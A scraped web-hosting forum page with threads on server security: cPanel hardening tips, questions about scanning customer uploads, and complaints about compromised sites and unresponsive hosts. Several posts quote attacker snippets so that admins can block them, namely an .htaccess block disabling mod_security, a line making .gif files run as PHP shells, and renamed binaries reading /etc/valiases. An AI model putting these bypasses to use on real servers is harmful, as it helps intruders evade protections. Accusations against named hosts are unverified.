I am giving few tips on securing your server against hack attempts. You must check these inspite of other securities like firewall, rootkits detectors etc. 1. Most Important, do not disable safe_mode under php.ini. If any customer asks to disable it, turn it off on his account only, not on whole server. As most of the time attack is done using shellc99 (phpshell) script. In case safe_mode is off on server and there are public dirs with 777 permission, he can easily hack through. 2. Compile apache with safe mode as well. 3. In cpanel under tweek settings, turn on base_dir, if someone requests to turn off, turn it off on his/her account only. As using phpshell one can easily move to main server dirs like /etc, /home. 4. Do not allow Anonymous Ftp on your server. You can turn it off from ftp config under WHM Service Configuration. If its allowed, one can easily bind port using nc tool with your server and gain root access. Always keep it disabled. 5. Make sure /tmp is secured. You can easily do that by running this command /scripts/securetmp using ssh. But do make sure, /tmp is secured. Else one can upload some kind of perl script in /tmp dir and can deface or damage all data on the few/all accounts on your server. keeping your server secure from hack attempts.
View Replies!
View Related
Hackers..spammers..
I've been on yet-another crusade this morning..and have a few questions for the..umm.."general" hosting audience. We live in odd times. If you told me that script kiddies might be able to completely comprimise a server via php..or that spammers are now using the webserver *itself* to send spam a few years ago..I would have laughed. This is no laughing matter. A concept of privacy comes into play..and I'm curious how many of you handle it. Joe pays me for a account..agrees to my TOS/AUP..and starts uploading files. The way I see it..we have many ways of dealing with scripts that do bad things. It seems to me, though...this may be considered "spying" on our customers. If we have a script..say..that runs every fifteen minutes..and looks for these scripts..wouldn't that be considered spying? Or would this be something we should just bury in our aup/tos that this might happen? I have read and agreed to quite a few of those AUP/TOS things..and I can't remember even one time even a mention that files that I upload to the server may be scanned or inspected..before allowing the file to be placved on the server. Never..not once. However...this may have changed. If you've ever tried to get even a simple Perl script to work on a Cpanel server...you probably understand that many safeguards are there for the sake of everybody else on the server...and may prevent you from doing what you want to do with the script(s). At the same time..though..it seems to fly in the face of common sense that many script packages available today are inherently insecure. Chmod 777 files and directories? Even in the times we live in today and know this is a very, very bad idea? Yet..there seem to be even more like this today than ever before. >>I mention this from first hand expereince. One of the many magazines I get had a article detailing the trials the author was having trying to get Simple Groupware working on a vps. yesterday..I noticed a post with a person wanting something installed on a production server. Not only was the program a beta..but..just like Simple Groupware..looked horribly insecure. In retrospect...I can remember the very first php script I ever used. The year was 1996..and this was my first Cpanel shared account. I even remember having to add *.php to the mime types. It installed without a hitch..and..coming from the Perl world I had spent many years in..and many hours getting those scripts to work..it seemed almost like a miracle. It seems, as hosts, there are a few ways we can go at this. 1) Modify the ftp server so it inspects files 2) Have a program that looks for things..much like rkhunter does. 3) A front-end for all scripts..perhaps MySQL as well..that enforces rulesets..for restricted content..or resource allocations.
View Replies!
View Related
Nobody Account Being Used By Hackers
One of my servers which hosts 200 domains is being attacked by hacker(s). It seems any world writeable files are being replaced or modified by the linux account nobody. How can I secure this account? Is it safe to change the password? I know many processes depend on using the nobody account to run.
View Replies!
View Related
Save My Site From Hackers
My site is going down lot of times due to high cpu quota and when i check cpu exceeded logs i could see some ip addresses trying to open non existenet permalinks i.e. my site is smartdesis.com and they try to open smartdesis.com/xxx which gives a 404 error which is causinf high cpu usage. Repetedly they are trying to open differnt urls by appending /xxx to them, i banned nearly 100 ips but they seem to be growing.
View Replies!
View Related
Autoban Hackers Searching For Phpmyadmin
I've seen perl scripts able to achieve this, so I am wondering if a tool similar to this has been released to work with APF / Iptables? The script in question is a "bot trap" and you put a deny rule in robots.txt to a hidden file. In that file, the script records the offending IP and blocks it in htaccess (once the file in question is hit by a bot/person). Getting a bit tired of seeing these morons always searching for: /phpmyadmin /pma etc, etc.
View Replies!
View Related
Stop Hackers From Disabling Mod_security
i have a problem with a hacker that uses .htaccess to disable mod_security using this code PHP Code: <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> so is there a way to stop this? also they have come up with a smart way to run shell files named as images using this code in .htaccess PHP Code: AddType application/x-httpd-php .gif is there a way to disable the "AddType application"?
View Replies!
View Related
Executing ./ Commands Through Hackers Shells
I've been concerned about executing commands through (./) using php and perl shells on the server a new way of hacking these days is using perl shells , even if the perl was terminated on the server ,, or was forbidden for users hackers upload a (perl) program to the server to use it instead of the server's own perl any way ,, chmoding the (ls-cat-more-less) to 4750 seems to give permission denied when exeuting these programs on the server but the hackers also found that they could upload their own ls-cat-more-less programs and use them instead of the server's they also could rename them ls==>ki or anything and use them like this ./ki /etc/valiases -alXrt and the commands work like charm for them ./ <<--- this command uses the sh program on the server ,, ((sh which refers to bash on most servers)) so ./ki is the same as sh ki and bash ki so i tried chmoding sh with 4750 and that killed the exploit i was concerned about cpanel's and the website's functionality so i tried changing an accounts password and creating a database ,, they both worked fine so ,, if u thing chmoding 4750 sh is a bad idea please let me know and if you know any other ways of disabling all the perl scripts on the server
View Replies!
View Related
ThePlanet.com Permitting Hackers Or Just Incompetent
ThePlanet.com permitting hackers or just incompetent? It sort of seems that way. I noticed my former boss's site was redirecting to the searchportal.information.com linkfarm junk site. I knew this was not his site and took a closer look at the link that I saw when I visited his site. I use NoScript in firefox and saw this as as a link on his primary page that the script was trying to make me go to. [url] This script then redirects me to this junk site. [url]...BDlaBQlSAFADDw I would not recommend going there unless you have Firefox installed with NoScript installed along with Adblock Plus. Who knows what exactly this site may be trying to do. Anyway, I noticed this was happening and took a look at the source of my boss's site as it is now and this is what I get: Code: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <BODY> <script type="text/javascript"> <!-- window.location = [url] //--> </script> </BODY> </HTML> So Java Script is being executed which executes that code located on on ThePlanet.com's service. Using the IP address that is hosting the script, I did a DNS check and come up with this: [url] Quote: OrgName: ThePlanet.com Internet Services, Inc. OrgID: TPCM Address: 315 Capitol Address: Suite 205 City: Houston StateProv: TX PostalCode: 77002 Country: US ReferralServer: rwhois://rwhois.theplanet.com:4321 NetRange: 216.40.192.0 - 216.40.255.255 CIDR: 216.40.192.0/18 OriginAS: AS13749, AS13884, AS21844, AS30315 OriginAS: AS36420 NetName: NETBLK-THEPLANET-BLK-EV1-5 NetHandle: NET-216-40-192-0-1 Parent: NET-216-0-0-0-0 NetType: Direct Allocation NameServer: NS1.EV1SERVERS.NET NameServer: NS2.EV1SERVERS.NET Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE RegDate: 2000-10-05 Updated: 2008-02-28 OrgAbuseHandle: ABUSE271-ARIN OrgAbuseName: The Planet Abuse OrgAbusePhone: +1-281-714-3560 OrgAbuseEmail: abuse@theplanet.com OrgNOCHandle: THEPL-ARIN OrgNOCName: The Planet NOC OrgNOCPhone: +1-281-714-3555 OrgNOCEmail: noc@theplanet.com OrgTechHandle: TECHN33-ARIN OrgTechName: Technical Support OrgTechPhone: +1-214-782-7800 OrgTechEmail: admins@theplanet.com # ARIN WHOIS database, last updated 2008-12-18 19:10 # Enter ? for additional hints on searching ARIN's WHOIS database. So I sent ThePlanet.com an email to Abuse@theplanet.com two days ago which is what their tech support phone number told me. This is the email I sent two days ago minus any information that would embarrass my former boss. Quote: Hi, > > I was taking a look at my former employers website to see if they had done > anything new with it and I saw this happen today. The domain is > website. I would not recommend you going to the site unless you > are using Firefox for a browser and have the NoScript plugin installed. A > perl script tries to automatically redirect with the domain of > [url]. This script automatically forwards to > [url] > . > > I think all that applies to you is that whoever owns the server or account > with IP 216.40.254.78 has been most likely compromised. A support > representative from your company said I must email you regarding this. I > got the contact information from the IP address within the script by looking > it up here: [url]. I also > notice that the entire IP address is compromised. > I have notified the owner of website as they use a different > host (Godaddy) and will need to have their hosting account cleaned up. I suppose it is also possible that someone is using your service for nefarious activities. > > If you have any further questions, please feel free to reply. > > Regards, > Lee This is the email I got just a few minutes from ThePlanet.com. Quote: On Thu, Dec 18, 2008 at 10:03 PM, <abuse@theplanet.com> wrote: > > Reference: [ThePlanetAbuse-C30396127D] > > Dear Sir or Madam, > > We appreciate you bringing this to our attention. We feel this issue has already been resolved, as we are unable to access the material in question. > > -- > Regards, > Abuse Department > The Planet > abuse@theplanet.com > [url] Now if you take a look at the above perl script, it is still there and going to that IP still executes that script and redirects you to the link farm. I replied with this just a few minutes ago. Quote: You do understand that when you go to the site of website.com it redirects to your one of your servers with an IP of 216.40.254.78. The actual scrip that runs is this one: [url] This then redirects to a link farm located on [url]. You do know that IP is your IP and that it is still there? That IP is one of your according to this: [url]One of two things is happening here. 1. The person who hacked someone else's website (website.com) either owns the server with the IP address listed above or this person hacked this server or. 2. Your server is being used in illegal hacking activity to redirect visitors of other websites to a site who's only purpose is to make money through a link farm. Either one of those above is unacceptable and to say that the material doesn't exist on your own server when I can see it from here would be an inaccurate statement. When viewing the source of website.com domain, this is the source HTML. This is very much using your server and hosting service to redirect unsuspecting users to a nefarious website.
View Replies!
View Related
OC3 Networks Supporting Scammers And Hackers And Hosting Warez
yesterday andhrahost.com hacked our WHMCS and sent emails to many of our customer here is the screen shoot , [url] [url] he also deleted all admin logs but luckily.i took this screen shoot Around 2 month back also this happen with us and we even informed OC3 about it but that time also. Mr Alex Ferrari From OC3 networks replied to me and didn't took any action on it.we daily get spam from oc3 networks ip. regularly they were trying to hack our whmcs and yesterday they did it i have even sent email to OC3 network and this time also ne reply from them and the hacker,spammer server is still up and selling warez hosting , illigal hosting openly. Kindly guide me how to proceed to take actions against OC3 netwokrs and against that hostig company who is doing this regurarely.
View Replies!
View Related
|
TRACKER
